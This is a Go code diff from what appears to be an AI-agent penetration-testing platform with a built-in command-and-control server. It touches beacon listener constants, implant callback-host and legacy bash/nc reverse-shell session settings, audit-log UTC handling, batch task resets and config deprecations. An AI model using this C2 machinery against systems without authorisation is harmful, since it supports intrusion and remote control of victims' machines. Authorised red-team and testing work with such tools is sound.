||||||
const tcpBeaconMagic = "CSB1"
|
const tcpBeaconMagic = "CSB1"
|
||||||
|
|
||||||
|
// tcpBeaconPeekTimeout 等待 CSB1 魔数的探测窗口;合法 Beacon 连接后立即发送魔数。
|
||||||
|
const tcpBeaconPeekTimeout = 2 * time.Second
|
||||||
|
|
||||||
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
|
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
|
||||||
const tcpBeaconMaxFrame = 64 << 20
|
const tcpBeaconMaxFrame = 64 << 20
|
||||||
|
|
||||||
|
|||||||
@@ -141,6 +141,8 @@ type ListenerConfig struct {
|
|||||||
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
|
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
|
||||||
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
|
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
|
||||||
CallbackHost string `json:"callback_host,omitempty"`
|
CallbackHost string `json:"callback_host,omitempty"`
|
||||||
|
// AllowLegacyShell 为 true 时 tcp_reverse 允许未加密的经典 bash/nc 反弹 shell 登记会话(默认 false,公网部署强烈不建议开启)
|
||||||
|
AllowLegacyShell bool `json:"allow_legacy_shell,omitempty"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
|
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
|
||||||
@@ -209,7 +211,9 @@ type TaskResultReport struct {
|
|||||||
TaskID string `json:"task_id"`
|
TaskID string `json:"task_id"`
|
||||||
Success bool `json:"success"`
|
Success bool `json:"success"`
|
||||||
Output string `json:"output,omitempty"`
|
Output string `json:"output,omitempty"`
|
||||||
|
OutputB64 string `json:"output_b64,omitempty"` // 原始控制台字节(base64),避免 JSON 破坏非 UTF-8 输出
|
||||||
Error string `json:"error,omitempty"`
|
Error string `json:"error,omitempty"`
|
||||||
|
ErrorB64 string `json:"error_b64,omitempty"`
|
||||||
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
|
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
|
||||||
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
|
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
|
||||||
StartedAt int64 `json:"started_at"`
|
StartedAt int64 `json:"started_at"`
|
||||||
|
|||||||
+43
-10
@@ -27,6 +27,7 @@ type Config struct {
|
|||||||
Database DatabaseConfig `yaml:"database"`
|
Database DatabaseConfig `yaml:"database"`
|
||||||
Auth AuthConfig `yaml:"auth"`
|
Auth AuthConfig `yaml:"auth"`
|
||||||
Audit AuditConfig `yaml:"audit,omitempty" json:"audit,omitempty"`
|
Audit AuditConfig `yaml:"audit,omitempty" json:"audit,omitempty"`
|
||||||
|
Monitor MonitorConfig `yaml:"monitor,omitempty" json:"monitor,omitempty"`
|
||||||
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
|
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
|
||||||
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
|
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
|
||||||
C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用
|
C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用
|
||||||
@@ -45,6 +46,7 @@ type ProjectConfig struct {
|
|||||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||||
DefaultProjectID string `yaml:"default_project_id,omitempty" json:"default_project_id,omitempty"` // 机器人/批量等无显式项目时绑定的默认项目
|
DefaultProjectID string `yaml:"default_project_id,omitempty" json:"default_project_id,omitempty"` // 机器人/批量等无显式项目时绑定的默认项目
|
||||||
FactIndexMaxRunes int `yaml:"fact_index_max_runes,omitempty" json:"fact_index_max_runes,omitempty"`
|
FactIndexMaxRunes int `yaml:"fact_index_max_runes,omitempty" json:"fact_index_max_runes,omitempty"`
|
||||||
|
FactIndexPathMaxRunes int `yaml:"fact_index_path_max_runes,omitempty" json:"fact_index_path_max_runes,omitempty"`
|
||||||
FactSummaryMaxRunes int `yaml:"fact_summary_max_runes,omitempty" json:"fact_summary_max_runes,omitempty"`
|
FactSummaryMaxRunes int `yaml:"fact_summary_max_runes,omitempty" json:"fact_summary_max_runes,omitempty"`
|
||||||
DefaultInjectDeprecated bool `yaml:"default_inject_deprecated,omitempty" json:"default_inject_deprecated,omitempty"`
|
DefaultInjectDeprecated bool `yaml:"default_inject_deprecated,omitempty" json:"default_inject_deprecated,omitempty"`
|
||||||
}
|
}
|
||||||
@@ -57,6 +59,14 @@ func (c ProjectConfig) FactIndexMaxRunesEffective() int {
|
|||||||
return c.FactIndexMaxRunes
|
return c.FactIndexMaxRunes
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// FactIndexPathMaxRunesEffective 攻击路径速览段的最大 rune 数(从 fact_index_max_runes 预算中预留)。
|
||||||
|
func (c ProjectConfig) FactIndexPathMaxRunesEffective() int {
|
||||||
|
if c.FactIndexPathMaxRunes <= 0 {
|
||||||
|
return 1000
|
||||||
|
}
|
||||||
|
return c.FactIndexPathMaxRunes
|
||||||
|
}
|
||||||
|
|
||||||
// FactSummaryMaxRunesEffective upsert 时 summary 最大 rune 数(索引一行,宜含验证要点)。
|
// FactSummaryMaxRunesEffective upsert 时 summary 最大 rune 数(索引一行,宜含验证要点)。
|
||||||
func (c ProjectConfig) FactSummaryMaxRunesEffective() int {
|
func (c ProjectConfig) FactSummaryMaxRunesEffective() int {
|
||||||
if c.FactSummaryMaxRunes <= 0 {
|
if c.FactSummaryMaxRunes <= 0 {
|
||||||
@@ -72,10 +82,12 @@ type MultiAgentConfig struct {
|
|||||||
BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理
|
BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理
|
||||||
// Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。
|
// Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。
|
||||||
Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"`
|
Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"`
|
||||||
MaxIteration int `yaml:"max_iteration" json:"max_iteration"` // 主代理 / 执行器最大推理轮次(Deep、Supervisor、plan_execute 的 Executor)
|
// MaxIteration 已废弃:统一使用 agent.max_iterations(YAML 中保留字段仅为兼容旧配置,运行时不读取)。
|
||||||
|
MaxIteration int `yaml:"max_iteration,omitempty" json:"max_iteration,omitempty"`
|
||||||
// PlanExecuteLoopMaxIterations plan_execute 模式下 execute↔replan 外层循环上限;0 表示用 Eino 默认 10。
|
// PlanExecuteLoopMaxIterations plan_execute 模式下 execute↔replan 外层循环上限;0 表示用 Eino 默认 10。
|
||||||
PlanExecuteLoopMaxIterations int `yaml:"plan_execute_loop_max_iterations,omitempty" json:"plan_execute_loop_max_iterations,omitempty"`
|
PlanExecuteLoopMaxIterations int `yaml:"plan_execute_loop_max_iterations,omitempty" json:"plan_execute_loop_max_iterations,omitempty"`
|
||||||
SubAgentMaxIterations int `yaml:"sub_agent_max_iterations" json:"sub_agent_max_iterations"`
|
// SubAgentMaxIterations 已废弃:子代理与主代理均使用 agent.max_iterations(Markdown max_iterations>0 可覆盖)。
|
||||||
|
SubAgentMaxIterations int `yaml:"sub_agent_max_iterations,omitempty" json:"sub_agent_max_iterations,omitempty"`
|
||||||
WithoutGeneralSubAgent bool `yaml:"without_general_sub_agent" json:"without_general_sub_agent"`
|
WithoutGeneralSubAgent bool `yaml:"without_general_sub_agent" json:"without_general_sub_agent"`
|
||||||
WithoutWriteTodos bool `yaml:"without_write_todos" json:"without_write_todos"`
|
WithoutWriteTodos bool `yaml:"without_write_todos" json:"without_write_todos"`
|
||||||
OrchestratorInstruction string `yaml:"orchestrator_instruction" json:"orchestrator_instruction"`
|
OrchestratorInstruction string `yaml:"orchestrator_instruction" json:"orchestrator_instruction"`
|
||||||
@@ -229,7 +241,7 @@ type MultiAgentEinoMiddlewareConfig struct {
|
|||||||
PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"`
|
PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"`
|
||||||
// Reduction truncates/offloads large tool outputs (requires eino local backend for Write).
|
// Reduction truncates/offloads large tool outputs (requires eino local backend for Write).
|
||||||
ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"`
|
ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"`
|
||||||
ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id
|
ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // 非空:落盘根目录(默认 tmp/reduction);其下按 projects/{id} 或 conversations/{id} 隔离
|
||||||
ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000
|
ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000
|
||||||
ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000
|
ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000
|
||||||
ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"`
|
ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"`
|
||||||
@@ -238,6 +250,8 @@ type MultiAgentEinoMiddlewareConfig struct {
|
|||||||
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
|
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
|
||||||
// SummarizationEmitInternalEvents controls middleware internal event emission (default true).
|
// SummarizationEmitInternalEvents controls middleware internal event emission (default true).
|
||||||
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
|
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
|
||||||
|
// SummarizationRetryMaxAttempts 已废弃:summarization 与 run loop 共用 run_retry_max_attempts 及 isEinoTransientRunError。
|
||||||
|
SummarizationRetryMaxAttempts int `yaml:"summarization_retry_max_attempts,omitempty" json:"summarization_retry_max_attempts,omitempty"`
|
||||||
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
|
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
|
||||||
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
|
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
|
||||||
// PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2).
|
// PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2).
|
||||||
@@ -250,9 +264,9 @@ type MultiAgentEinoMiddlewareConfig struct {
|
|||||||
CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"`
|
CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"`
|
||||||
// DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off.
|
// DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off.
|
||||||
DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"`
|
DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"`
|
||||||
// DeepModelRetryMaxRetries > 0 enables deep.Config ModelRetryConfig (framework-level chat model retries).
|
// DeepModelRetryMaxRetries 已废弃:临时错误统一由 run loop 内 isEinoTransientRunError + run_retry_max_attempts 处理。
|
||||||
DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"`
|
DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"`
|
||||||
// RunRetryMaxAttempts > 0:429/5xx/网络抖动时 handler 分段续跑次数;0=默认 10。
|
// RunRetryMaxAttempts > 0:429/5xx/网络抖动时可退避重试次数(run loop 与 summarization 共用);0=默认 10。
|
||||||
RunRetryMaxAttempts int `yaml:"run_retry_max_attempts,omitempty" json:"run_retry_max_attempts,omitempty"`
|
RunRetryMaxAttempts int `yaml:"run_retry_max_attempts,omitempty" json:"run_retry_max_attempts,omitempty"`
|
||||||
// RunRetryMaxBackoffSec 单次退避上限秒数;0=默认 30。
|
// RunRetryMaxBackoffSec 单次退避上限秒数;0=默认 30。
|
||||||
RunRetryMaxBackoffSec int `yaml:"run_retry_max_backoff_sec,omitempty" json:"run_retry_max_backoff_sec,omitempty"`
|
RunRetryMaxBackoffSec int `yaml:"run_retry_max_backoff_sec,omitempty" json:"run_retry_max_backoff_sec,omitempty"`
|
||||||
@@ -589,10 +603,8 @@ type DatabaseConfig struct {
|
|||||||
}
|
}
|
||||||
|
|
||||||
type AgentConfig struct {
|
type AgentConfig struct {
|
||||||
MaxIterations int `yaml:"max_iterations" json:"max_iterations"`
|
MaxIterations int `yaml:"max_iterations" json:"max_iterations"`
|
||||||
LargeResultThreshold int `yaml:"large_result_threshold" json:"large_result_threshold"` // 大结果阈值(字节),默认50KB
|
ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
|
||||||
ResultStorageDir string `yaml:"result_storage_dir" json:"result_storage_dir"` // 结果存储目录,默认tmp
|
|
||||||
ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
|
|
||||||
// SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。
|
// SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。
|
||||||
SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"`
|
SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"`
|
||||||
}
|
}
|
||||||
@@ -612,6 +624,23 @@ type AuthConfig struct {
|
|||||||
GeneratedPasswordPersistErr string `yaml:"-" json:"-"`
|
GeneratedPasswordPersistErr string `yaml:"-" json:"-"`
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// MonitorConfig MCP 状态监控(tool_executions)保留策略。
|
||||||
|
type MonitorConfig struct {
|
||||||
|
// RetentionDays 执行记录保留天数;省略时默认 90;0 表示不自动清理。
|
||||||
|
RetentionDays *int `yaml:"retention_days,omitempty" json:"retention_days,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// RetentionDaysEffective returns retention; 0 means keep forever; omitted defaults to 90.
|
||||||
|
func (m MonitorConfig) RetentionDaysEffective() int {
|
||||||
|
if m.RetentionDays == nil {
|
||||||
|
return 90
|
||||||
|
}
|
||||||
|
if *m.RetentionDays < 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
return *m.RetentionDays
|
||||||
|
}
|
||||||
|
|
||||||
// AuditConfig platform operation audit log settings (not chat/tool execution bodies).
|
// AuditConfig platform operation audit log settings (not chat/tool execution bodies).
|
||||||
type AuditConfig struct {
|
type AuditConfig struct {
|
||||||
// Enabled nil or true enables persistence; explicit false disables.
|
// Enabled nil or true enables persistence; explicit false disables.
|
||||||
@@ -1263,6 +1292,10 @@ func Default() *Config {
|
|||||||
Enabled: &on,
|
Enabled: &on,
|
||||||
}
|
}
|
||||||
}(),
|
}(),
|
||||||
|
Monitor: func() MonitorConfig {
|
||||||
|
days := 90
|
||||||
|
return MonitorConfig{RetentionDays: &days}
|
||||||
|
}(),
|
||||||
Robots: RobotsConfig{
|
Robots: RobotsConfig{
|
||||||
Session: RobotSessionConfig{
|
Session: RobotSessionConfig{
|
||||||
StrictUserIdentity: &strictRobotIdentity,
|
StrictUserIdentity: &strictRobotIdentity,
|
||||||
|
|||||||
@@ -15,8 +15,7 @@ type VisionConfig struct {
|
|||||||
JPEGQuality int `yaml:"jpeg_quality,omitempty" json:"jpeg_quality,omitempty"`
|
JPEGQuality int `yaml:"jpeg_quality,omitempty" json:"jpeg_quality,omitempty"`
|
||||||
MaxPayloadBytes int64 `yaml:"max_payload_bytes,omitempty" json:"max_payload_bytes,omitempty"`
|
MaxPayloadBytes int64 `yaml:"max_payload_bytes,omitempty" json:"max_payload_bytes,omitempty"`
|
||||||
SkipPreprocessBelowBytes int64 `yaml:"skip_preprocess_below_bytes,omitempty" json:"skip_preprocess_below_bytes,omitempty"` // 0=始终压缩;默认 2MB 且长边已<=max_dimension 时原图直传
|
SkipPreprocessBelowBytes int64 `yaml:"skip_preprocess_below_bytes,omitempty" json:"skip_preprocess_below_bytes,omitempty"` // 0=始终压缩;默认 2MB 且长边已<=max_dimension 时原图直传
|
||||||
Detail string `yaml:"detail,omitempty" json:"detail,omitempty"` // low | high | auto
|
Detail string `yaml:"detail,omitempty" json:"detail,omitempty"` // low | high | auto
|
||||||
AllowedRoots []string `yaml:"allowed_roots,omitempty" json:"allowed_roots,omitempty"`
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func (v VisionConfig) TimeoutSecondsEffective() int {
|
func (v VisionConfig) TimeoutSecondsEffective() int {
|
||||||
|
|||||||
@@ -77,7 +77,7 @@ func (db *DB) LoadAttackChainNodes(conversationID string) ([]AttackChainNode, er
|
|||||||
SELECT id, node_type, node_name, tool_execution_id, metadata, risk_score
|
SELECT id, node_type, node_name, tool_execution_id, metadata, risk_score
|
||||||
FROM attack_chain_nodes
|
FROM attack_chain_nodes
|
||||||
WHERE conversation_id = ?
|
WHERE conversation_id = ?
|
||||||
ORDER BY created_at ASC
|
ORDER BY created_at ASC, rowid ASC
|
||||||
`
|
`
|
||||||
|
|
||||||
rows, err := db.Query(query, conversationID)
|
rows, err := db.Query(query, conversationID)
|
||||||
@@ -123,7 +123,7 @@ func (db *DB) LoadAttackChainEdges(conversationID string) ([]AttackChainEdge, er
|
|||||||
SELECT id, source_node_id, target_node_id, edge_type, weight
|
SELECT id, source_node_id, target_node_id, edge_type, weight
|
||||||
FROM attack_chain_edges
|
FROM attack_chain_edges
|
||||||
WHERE conversation_id = ?
|
WHERE conversation_id = ?
|
||||||
ORDER BY created_at ASC
|
ORDER BY created_at ASC, rowid ASC
|
||||||
`
|
`
|
||||||
|
|
||||||
rows, err := db.Query(query, conversationID)
|
rows, err := db.Query(query, conversationID)
|
||||||
|
|||||||
@@ -69,12 +69,12 @@ func buildAuditLogsWhere(filter ListAuditLogsFilter) (string, []interface{}) {
|
|||||||
args = append(args, filter.ResourceID)
|
args = append(args, filter.ResourceID)
|
||||||
}
|
}
|
||||||
if filter.Since != nil {
|
if filter.Since != nil {
|
||||||
conditions = append(conditions, "created_at >= ?")
|
conditions = append(conditions, sqliteEpochGE("created_at", ">="))
|
||||||
args = append(args, *filter.Since)
|
args = append(args, formatSQLiteUTC(*filter.Since))
|
||||||
}
|
}
|
||||||
if filter.Until != nil {
|
if filter.Until != nil {
|
||||||
conditions = append(conditions, "created_at <= ?")
|
conditions = append(conditions, sqliteEpochGE("created_at", "<="))
|
||||||
args = append(args, *filter.Until)
|
args = append(args, formatSQLiteUTC(*filter.Until))
|
||||||
}
|
}
|
||||||
if q := strings.TrimSpace(filter.Query); q != "" {
|
if q := strings.TrimSpace(filter.Query); q != "" {
|
||||||
like := "%" + q + "%"
|
like := "%" + q + "%"
|
||||||
@@ -93,7 +93,9 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
|
|||||||
return errors.New("audit id is required")
|
return errors.New("audit id is required")
|
||||||
}
|
}
|
||||||
if row.CreatedAt.IsZero() {
|
if row.CreatedAt.IsZero() {
|
||||||
row.CreatedAt = time.Now()
|
row.CreatedAt = time.Now().UTC()
|
||||||
|
} else {
|
||||||
|
row.CreatedAt = row.CreatedAt.UTC()
|
||||||
}
|
}
|
||||||
if strings.TrimSpace(row.Level) == "" {
|
if strings.TrimSpace(row.Level) == "" {
|
||||||
row.Level = "info"
|
row.Level = "info"
|
||||||
@@ -111,7 +113,7 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
|
|||||||
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
|
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
|
||||||
`
|
`
|
||||||
_, err := db.Exec(query,
|
_, err := db.Exec(query,
|
||||||
row.ID, row.CreatedAt, row.Level, row.Category, row.Action, row.Result,
|
row.ID, formatSQLiteUTC(row.CreatedAt), row.Level, row.Category, row.Action, row.Result,
|
||||||
row.Actor, row.SessionHint, row.ClientIP, row.UserAgent,
|
row.Actor, row.SessionHint, row.ClientIP, row.UserAgent,
|
||||||
row.ResourceType, row.ResourceID, row.Message, detailJSON,
|
row.ResourceType, row.ResourceID, row.Message, detailJSON,
|
||||||
)
|
)
|
||||||
@@ -202,7 +204,7 @@ func (db *DB) ListAuditLogs(filter ListAuditLogsFilter) ([]*AuditLog, error) {
|
|||||||
|
|
||||||
// DeleteAuditLogsBefore removes rows older than cutoff.
|
// DeleteAuditLogsBefore removes rows older than cutoff.
|
||||||
func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) {
|
func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) {
|
||||||
res, err := db.Exec(`DELETE FROM audit_logs WHERE created_at < ?`, cutoff)
|
res, err := db.Exec(`DELETE FROM audit_logs WHERE `+sqliteEpochGE("created_at", "<"), formatSQLiteUTC(cutoff))
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return 0, err
|
return 0, err
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,62 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestBuildAuditLogsWhere_timeFilterSQL(t *testing.T) {
|
||||||
|
since := time.Date(2026, 6, 16, 17, 2, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 6, 17, 3, 3, 0, 0, time.UTC)
|
||||||
|
where, args := buildAuditLogsWhere(ListAuditLogsFilter{Since: &since, Until: &until})
|
||||||
|
if !strings.Contains(where, "strftime('%s', created_at) >=") {
|
||||||
|
t.Fatalf("expected epoch comparison for since, got %q", where)
|
||||||
|
}
|
||||||
|
if !strings.Contains(where, "strftime('%s', created_at) <=") {
|
||||||
|
t.Fatalf("expected epoch comparison for until, got %q", where)
|
||||||
|
}
|
||||||
|
if len(args) != 2 {
|
||||||
|
t.Fatalf("expected 2 time args, got %d", len(args))
|
||||||
|
}
|
||||||
|
for i, arg := range args {
|
||||||
|
s, ok := arg.(string)
|
||||||
|
if !ok || s == "" {
|
||||||
|
t.Fatalf("arg %d: want non-empty UTC RFC3339 string, got %v", i, arg)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestListAuditLogs_timeFilterMixedStorageFormats(t *testing.T) {
|
||||||
|
root, err := os.Getwd()
|
||||||
|
if err != nil {
|
||||||
|
t.Skip(err)
|
||||||
|
}
|
||||||
|
dbPath := filepath.Join(root, "..", "..", "data", "conversations.db")
|
||||||
|
if _, err := os.Stat(dbPath); err != nil {
|
||||||
|
t.Skip("conversations.db not found")
|
||||||
|
}
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
since, _ := ParseRFC3339Time("2026-06-16T17:02:00Z")
|
||||||
|
until, _ := ParseRFC3339Time("2026-06-17T03:03:00Z")
|
||||||
|
filter := ListAuditLogsFilter{Since: &since, Until: &until, Limit: 50}
|
||||||
|
logs, err := db.ListAuditLogs(filter)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
for _, row := range logs {
|
||||||
|
at := row.CreatedAt.UTC()
|
||||||
|
if at.Before(since) || at.After(until) {
|
||||||
|
t.Fatalf("log %s at %s outside [%s, %s]", row.ID, at, since, until)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -239,7 +239,7 @@ func (db *DB) CountBatchQueues(status, keyword string) (int, error) {
|
|||||||
// GetBatchTasks 获取批量任务队列的所有任务
|
// GetBatchTasks 获取批量任务队列的所有任务
|
||||||
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
|
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
|
||||||
rows, err := db.Query(
|
rows, err := db.Query(
|
||||||
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY id",
|
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY rowid ASC",
|
||||||
queueID,
|
queueID,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -507,6 +507,42 @@ func (db *DB) CancelPendingBatchTasks(queueID string, completedAt time.Time) err
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// PrepareBatchSingleTaskRun 准备单条执行:可选重置子任务,并更新队列索引与状态
|
||||||
|
func (db *DB) PrepareBatchSingleTaskRun(queueID, taskID string, taskIndex int, resetTask, resumeQueue bool) error {
|
||||||
|
tx, err := db.Begin()
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("开始事务失败: %w", err)
|
||||||
|
}
|
||||||
|
defer tx.Rollback()
|
||||||
|
|
||||||
|
if resetTask {
|
||||||
|
_, err = tx.Exec(
|
||||||
|
"UPDATE batch_tasks SET status = ?, conversation_id = NULL, started_at = NULL, completed_at = NULL, error = NULL, result = NULL WHERE queue_id = ? AND id = ?",
|
||||||
|
"pending", queueID, taskID,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("重置批量任务状态失败: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if resumeQueue {
|
||||||
|
_, err = tx.Exec(
|
||||||
|
"UPDATE batch_task_queues SET status = ?, current_index = ?, completed_at = NULL, last_run_error = NULL WHERE id = ?",
|
||||||
|
"paused", taskIndex, queueID,
|
||||||
|
)
|
||||||
|
} else {
|
||||||
|
_, err = tx.Exec(
|
||||||
|
"UPDATE batch_task_queues SET current_index = ?, last_run_error = NULL WHERE id = ?",
|
||||||
|
taskIndex, queueID,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("更新批量任务队列状态失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return tx.Commit()
|
||||||
|
}
|
||||||
|
|
||||||
// DeleteBatchTask 删除批量任务
|
// DeleteBatchTask 删除批量任务
|
||||||
func (db *DB) DeleteBatchTask(queueID, taskID string) error {
|
func (db *DB) DeleteBatchTask(queueID, taskID string) error {
|
||||||
_, err := db.Exec(
|
_, err := db.Exec(
|
||||||
|
|||||||
+48
-1
@@ -17,6 +17,9 @@ var ErrNoValidC2EventIDs = errors.New("no valid event ids")
|
|||||||
// ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID
|
// ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID
|
||||||
var ErrNoValidC2TaskIDs = errors.New("no valid task ids")
|
var ErrNoValidC2TaskIDs = errors.New("no valid task ids")
|
||||||
|
|
||||||
|
// ErrNoValidC2SessionIDs 批量删除会话时未提供任何合法 ID
|
||||||
|
var ErrNoValidC2SessionIDs = errors.New("no valid session ids")
|
||||||
|
|
||||||
// validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参
|
// validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参
|
||||||
func validC2TextIDForDelete(id string) bool {
|
func validC2TextIDForDelete(id string) bool {
|
||||||
if len(id) < 2 || len(id) > 80 {
|
